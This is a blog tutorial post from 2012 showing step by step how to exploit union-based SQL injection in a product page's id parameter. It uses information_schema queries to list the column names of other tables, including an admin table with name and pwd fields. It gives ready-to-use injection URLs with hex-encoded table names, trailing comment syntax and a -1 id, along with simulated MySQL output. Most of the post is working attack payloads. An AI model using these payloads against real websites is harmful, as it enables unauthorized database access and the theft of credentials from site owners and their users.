Monday, July 2, 2012

Dumping The Columns Of A Table

Okay, so now that we know how to find the Table Names, lets try to find the columns in the Tables.

From our Last post we know that the Database has three tables:

admin, products, users

And Our URL:

www.example.com/index.php?id=1

Lets change the URL for better understanding, assume we are on the Products Page Of the Website, where certain product id displays information related the id.

So, www.example.com/products.php?id=1

So in the backend database its something like this,

mysql> select id, product, price from products where id=1;

+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer |  2500 |
+------+---------+-------+
1 row in set (0.00 sec)

mysql>

We know the columns count used is three from the earlier posts.

Now we will see the magic, we are on the products table, but being in this table we will try dumping the data of the other tables in the database.

So Lets check the Simulation First from the MySQL Server.

We will split the query:

SELECT id, product, price FROM products WHERE id = <user input>;

So left hand side is the Developers Code, And Pentester has to work on the Right Hand Side.

We know, the below query will show the tables in the database,

mysql> select * from products where id=1 union select 1,2,table_name from information_schema.tables where table_schema='ckorner';
+------+---------+----------+
| id   | product | price    |
+------+---------+----------+
|    1 | printer | 2500     |
|    1 | 2       | admin    |
|    1 | 2       | products |
|    1 | 2       | users    |
+------+---------+----------+
4 rows in set (0.00 sec)

So lets say we are interested to look for the admin table, so what do we have to do now, we have to find the columns in the admin table.

Database 'information_schema' has a Table named 'column_name' that holds the column names for all the tables in a database. So we will use the 'information_schema' database once again to find the columns in the table 'admin' of database 'ckorner'

mysql> select * from products where id=1 union select 1,2,column_name from information_schema.columns where table_name='admin';
+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer | 2500  |
|    1 | 2       | id    |
|    1 | 2       | name  |
|    1 | 2       | pwd   |
+------+---------+-------+
4 rows in set (0.00 sec)

mysql>

So we get the Columns of 'admin' in the 'ckorner' database. lets try for the other tables in 'ckorner' database.

mysql> select * from products where id=1 union select 1,2,column_name from information_schema.columns where table_name='products';
+------+---------+---------+
| id   | product | price   |
+------+---------+---------+
|    1 | printer | 2500    |
|    1 | 2       | id      |
|    1 | 2       | product |
|    1 | 2       | price   |
+------+---------+---------+
4 rows in set (0.00 sec)

mysql> select * from products where id=1 union select 1,2,column_name from information_schema.columns where table_name='users';
+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer | 2500  |
|    1 | 2       | id    |
|    1 | 2       | name  |
|    1 | 2       | pwd   |
+------+---------+-------+
4 rows in set (0.00 sec)

mysql>

So we see that it easily dumps the column names of other tables (admin, users) inspite of being in a query that is supposed to show the contents 'products' table.

So now we will put our built queries in the URL:

www.example.com/products.php?id=1

www.example.com/products.php?id=1 union select 1,2,column_name from information_schema.columns where table_name='admin'

It dint dump, reason? remember I said, its URL and the parameters has to be hex encoded, you can encode the passing parameter 'admin' from online tools, or you can use our tool to hex encode the paramters.

Download Link: Click Here

hex encode of 'admin' is: 0x61646d696e

Are we still missing out something? remember the comment symbol?

we have to comment out the rest of the queries being passed, so that before the query reaches the database, the remaining queries gets ignored.

www.example.com/products.php?id=1 union select 1,2,column_name from information_schema.columns where table_name=0x61646d696e --+

In Some Cases If It Doesnt Work, You need To change The Id Value With An Id that doesnt exist in the Table like 9999 or -1, using -1 is a sure shot value to dump as there would be no records with -1 value

www.example.com/products.php?id = -1 union select 1,2,column_name from information_schema.columns where table_name=0x61646d696e --+

And this this out display the column names of Table 'admin'.

Thats all for this post, hope this was informative.

Thank You!

0 comments:

Post a Comment